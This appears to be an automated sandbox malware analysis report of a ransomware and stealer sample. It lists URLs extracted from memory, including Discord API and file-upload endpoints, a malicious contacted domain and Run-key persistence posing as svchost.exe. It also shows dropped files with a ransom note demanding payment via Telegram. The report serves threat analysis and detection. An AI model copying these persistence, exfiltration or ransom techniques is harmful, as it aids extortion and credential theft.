                  https://spotify.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.iana.org/time-zones/repository/tz-link.htmlMai.exe, 00000004.00000003.1540933860.000001995E361000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://docs.python.org/library/itertools.html#recipesMai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://yahoo.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://discord.com/api/users/Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.gofile.io/getServerMai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://steam.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcaMai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://packaging.python.org/en/latest/specifications/declaring-project-metadata/Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2320826704.000001995E458000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552591972.000001995E403000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2305500569.000001995E44F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2253924045.000001995E44C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2334629897.000001995E45B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2238942833.000001995E44B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545696959.000001995E40E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1553018358.000001995E43E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1542837456.000001995E420000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/pypa/setuptools/issues/1024.Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/Mai.exe, 00000004.00000003.1545696959.000001995E38D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1542837456.000001995E38D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2210091841.000001995DD62000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://hotmail.com)zMai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.accv.es0Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.python.org/Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554670684.000001995F0EC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2266539897.000001995F107000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://twitter.com/Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2299599683.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276009216.000001995F0A0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2393139003.000001995F0B0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2282469085.000001995E0B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720682259.000001995F0B0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://hbo.com)Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.quovadisglobal.com/cpsMai.exe, 00000004.00000003.2321410286.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2554277610.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2471562987.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2588079315.000001995F484000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  104.26.3.16 | rentry.co | United States | 13335 | CLOUDFLARENETUS | true
                  IP
                  127.0.0.1
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1504078
                  Start date and time:2024-09-04 14:25:28 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 14m 4s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:52
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:4wx72yFLka.exe
                  renamed because original name is a hash value
                  Original Sample Name:7737fb5fa7440206dbbd7dbeb8222a2851caf6210005e37d6d5d765081940e9a.exe
                  Detection:MAL
                  Classification:mal100.rans.phis.troj.spyw.evad.winEXE@62/1169@1/2
                  EGA Information:
                  • Successful, ratio: 42.9%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 178
                  • Number of non-executed functions: 187
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe
                  • Excluded IPs from analysis (whitelisted): 184.28.90.27
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, crl3.digicert.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target main.exe, PID 7676 because it is empty
                  • Execution Graph export aborted for target svchost.exe, PID 3828 because it is empty
                  • Execution Graph export aborted for target svchost.exe, PID 7008 because it is empty
                  • Execution Graph export aborted for target svchost.exe, PID 7772 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • Report size getting too big, too many NtReadFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Report size getting too big, too many NtWriteFile calls found.
                  Time | Type | Description
                  08:26:40 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
                  08:26:55 | API Interceptor | 3x Sleep call for process: svchost.exe modified
                  14:26:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UpdateTask C:\Users\user\AppData\Roaming\svchost.exe
                  14:26:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UpdateTask C:\Users\user\AppData\Roaming\svchost.exe
                  14:27:09 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt
                  Match | Associated Sample Name / URL | Detection | Threat Name
                  104.26.3.16 | quotation.js | malicious | Unknown
                  104.26.3.16 | Quote.js | malicious | Unknown
                  104.26.3.16 | SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe | malicious | Unknown
                  104.26.3.16 | SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exe | malicious | Unknown
                  104.26.3.16 | SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe | malicious | Unknown
                  104.26.3.16 | CV.vbs | malicious | Xmrig
                  104.26.3.16 | system47.exe | malicious | XWorm
                  104.26.3.16 | file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
                  104.26.3.16 | file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
                  104.26.3.16 | S982i1J0Uk.msi | malicious | Unknown
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  rentry.co | 0U9NY2PzhK.exe | malicious | Python Stealer, CStealer, Chaos | 172.67.75.40
                  rentry.co | qlk8old6p9.exe | malicious | Python Stealer, CStealer, Chaos | 172.67.75.40
                  rentry.co | quotation.js | malicious | Unknown | 104.26.3.16
                  rentry.co | Quote.js | malicious | Unknown | 104.26.3.16
                  rentry.co | SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe | malicious | Unknown | 104.26.3.16
                  rentry.co | SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exe | malicious | Unknown | 104.26.3.16
                  rentry.co | SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe | malicious | Unknown | 104.26.3.16
                  rentry.co | SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exe | malicious | Unknown | 104.26.2.16
                  rentry.co | CV.vbs | malicious | Xmrig | 104.26.3.16
                  rentry.co | SecuriteInfo.com.Trojan.GenericFCA.Script.33276.27996.26811.exe | malicious | Unknown | 104.26.2.16
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  CLOUDFLARENETUS | 9DP4y36Dlu.exe | malicious | Unknown | 188.114.96.3
                  CLOUDFLARENETUS | 0U9NY2PzhK.exe | malicious | Python Stealer, CStealer, Chaos | 172.67.75.40
                  CLOUDFLARENETUS | icTynpKakZ.exe | malicious | Unknown | 104.26.11.3
                  CLOUDFLARENETUS | qlk8old6p9.exe | malicious | Python Stealer, CStealer, Chaos | 172.67.75.40
                  CLOUDFLARENETUS | 04-09.htm | malicious | Unknown | 104.17.25.14
                  CLOUDFLARENETUS | http://gooel.com | malicious | Unknown | 162.247.243.39
                  CLOUDFLARENETUS | 1YJgPEJr4V.exe | malicious | Unknown | 104.26.0.5
                  CLOUDFLARENETUS | MQcD9IhgQD.exe | malicious | Snake Keylogger | 188.114.96.3
                  CLOUDFLARENETUS | BrowserUpdater.exe | malicious | Unknown | 104.21.90.99
                  CLOUDFLARENETUS | eYJh5eegYh.exe | malicious | Unknown | 172.67.70.230
                                      No context
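                  Match | Associated Sample Name / URL | Detection | Threat Name
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | 0U9NY2PzhK.exe | malicious | Python Stealer, CStealer, Chaos
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | qlk8old6p9.exe | malicious | Python Stealer, CStealer, Chaos
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | tjigfd64.exe | malicious | LummaC Stealer
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | tjigfd64.exe | malicious | LummaC Stealer
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | neverlose.exe | malicious | Discord Token Stealer
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | dXaIbmbdKj.exe | malicious | Vidar
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | visabuilder.exe | malicious | Python Stealer, Discord Token Stealer
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | allchecker.exe | malicious | Python Stealer, CStealer
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | LisectAVT_2403002A_396.exe | malicious | Python Stealer
                  C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pyd | 00#U2800.exe | malicious | Python Stealer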
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8192
                                                          Entropy (8bit):0.35999246155449205
                                                          Encrypted:false
                                                          SSDEEP:6:6xDoaaD0JOCEfMuaaD0JOCEfMKQmDMxDoaaD0JOCEfMuaaD0JOCEfMKQmD:haaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                                          MD5:D6D3830984AEC72B32E4EF5030B32290
                                                          SHA1:A645195729EB557B4B773E137AA78ECB17CFB96D
                                                          SHA-256:09BA30C4D4F2F7FEC3C62A7AD0D5103CE6662FDAB91F62803144CCB6B20E4604
                                                          SHA-512:44C27B21C2BB77D57AC1499ABFEB4FA11B45A7EC856276696132498302733B88EE7D748E05ABD6DAC09C8A478CCC803F16A8E1FF7305245F82E382D2617AA69F
                                                          Malicious:false
                                                          Preview:*.>...........~.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................~.............................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.8063208214623928
                                                          Encrypted:false
                                                          SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAx:RJE+Lfki1GjHwU/+vVhWqpA
                                                          MD5:ABD0DF21EF7B4A4D9C8E548C92159B7D
                                                          SHA1:E78960C23CA1E42ABA521E5ADC0FB5573812D32C
                                                          SHA-256:539A099B2233F2EB610C0915CC2CECC45EB3941A2C113850FDEF56B2B382F2E0
                                                          SHA-512:118961262063985FA866E54BBEC4CE9A50AD734274B059EF73BF9188BBF3C5D4A779BDB223FEF680850B6413A08DEC65A61F5C3B45872AB86568964EB639C5D7
                                                          Malicious:false
                                                          Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1f66353e, page size 16384, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1048576
                                                          Entropy (8bit):0.7864320050088061
                                                          Encrypted:false
                                                          SSDEEP:1536:TSB2ESB2SSjlK/IECXK0I9XGJCTgzEYkr3g16t2UPkLk+k0+lKuy9nyS2kILzsL6:TazauEezm2U
                                                          MD5:78AA86CDC87CC491E94AB25A1AB22DED
                                                          SHA1:E0C0AB110622751FDE1F50FFD6ECA8C046B9717E
                                                          SHA-256:3E30163FF249E5E18D4E427430CB12B23D422926DA24FB791C165695D849BF28
                                                          SHA-512:C21196936292ECC65506F955A0AF248F8B4CBDDA4B90199F4A0DFE944E5DFEAD7FBAF49712B74935C074535229347F12CE3E0C8962578FAC0AEBF4A8BE5FB493
                                                          Malicious:false
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.0796650317767422
                                                          Encrypted:false
                                                          SSDEEP:3:qW/lOetYeo34uqgwl/tES4iHKAZC/tlDqwl/tollmn/lZOPp3lll:ltrz64lglhANiD
                                                          MD5:7E0FD18608FE55D24B3423FB76BBB6FF
                                                          SHA1:ADFDFFBFD17993AC61A2BEECC1C6755C983554FB
                                                          SHA-256:899ADF141A09C65C58884D122DC58D3BA5FEA43B4AB7E86351A311861E5D8EEB
                                                          SHA-512:56439386C9BA73D588A0C9AA9ADE206D91A61137F1868E8A659662DC5147C8D551D0F8DC11F4DC7B0477F3F93DC6A676279EF640CD99723590ECA77216C81E5A
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):448
                                                          Entropy (8bit):6.557907893568431
                                                          Encrypted:false
                                                          SSDEEP:12:KX0UAGBWcDxn9SB9dN9Ph3gv/qYByvyBYATE37HHSoy3LtkYY:KXDbWcDxn9SB9dN9EqY0nAQDyBW1
                                                          MD5:3A97499816D7E8BF689EF2B1F74AA58F
                                                          SHA1:6DA21113B771912FDA8F0BBF8253F603757DF75C
                                                          SHA-256:1F12166BCC58E3AE694D179F8889C3C47202F01454709F378219D2C8ED388C3A
                                                          SHA-512:00C2EDB5CAD38DDA9E970A09ED70550637094124CD838E89F57BA67FBC6325D72DFD4E230C76F5562167F9C3E44C041EBEDB57E05476FDC435C7AA5520499053
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64304
                                                          Entropy (8bit):7.9969939993500345
                                                          Encrypted:true
                                                          SSDEEP:1536:X3L7aJOxYSZFitRg1gzjQwXTiDKcw5XRZ8sz:Xb9qOFity1kQcQKlNPN
                                                          MD5:F1807C674345DFD2505DDD21D8A6FB36
                                                          SHA1:88BCC5492C416A140B0D74A4B0F1F888DB56EBFB
                                                          SHA-256:EF8A8F5ED5936E6AE068CF7C06475C6E14CF0AE7183E38D808D11705362FE210
                                                          SHA-512:0CE56E339734F7447CCB79D0E4BE546B4D111825783EF8C293CA05686DB13F679A81CDFBCC59B77DB81B2CBA1DA12835913B80BB9A215D066156577B39B69B66
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.976235942469954
                                                          Encrypted:false
                                                          SSDEEP:192:2NUv5zmEX3zBIOZMKQDzcXpaNOG+HyoT2jZRcD:2Sv9/X3KOScXsNX+dT6Lq
                                                          MD5:AC5A29BE6AAB5B10A01A4B292CB9FC9F
                                                          SHA1:AAC8883B938229E6927501E3055DAA32976DE327
                                                          SHA-256:E8EBE69806A7C79AC86CD5DDC309AAA92758A4C3DAF1A84302C5CEDBE0897633
                                                          SHA-512:7C2C31DB7B16EB4290C0C84EDCEABFEB7F87DCFBEF539C2E25ECBC62513D1E313818F8F01EE29B6B7403869F58F4A7555C42C08DD839BDEAAE5033BCA5C0F16F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.772872330121152
                                                          Encrypted:false
                                                          SSDEEP:24:qCLA5zzW6N5MFg533Qnw9XJtW2aEBuS9kTYHfi8gv//CYmt4h7:qC0tyQQw9XJtWsBuS9kTQi8S3CYmt4h7
                                                          MD5:EA2D2A3A6AC12AC7874180ECA6A365B0
                                                          SHA1:F8D8E0E1F1648F6F8A0E6B3651457A8961E3B10E
                                                          SHA-256:49D1EAD1E49E9F93E238E6CCC384DEB4A92494DD6B480033BF6F78D691B6892E
                                                          SHA-512:407CAEF3B237315DC91AF1E351DA13B1F88FD8EB97A9C680F74C9ACB89F56DC09C804C81F208C0FA1730B476C194D02F03356101A4BA5CDE69FB288672B128D8
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.759026428503303
                                                          Encrypted:false
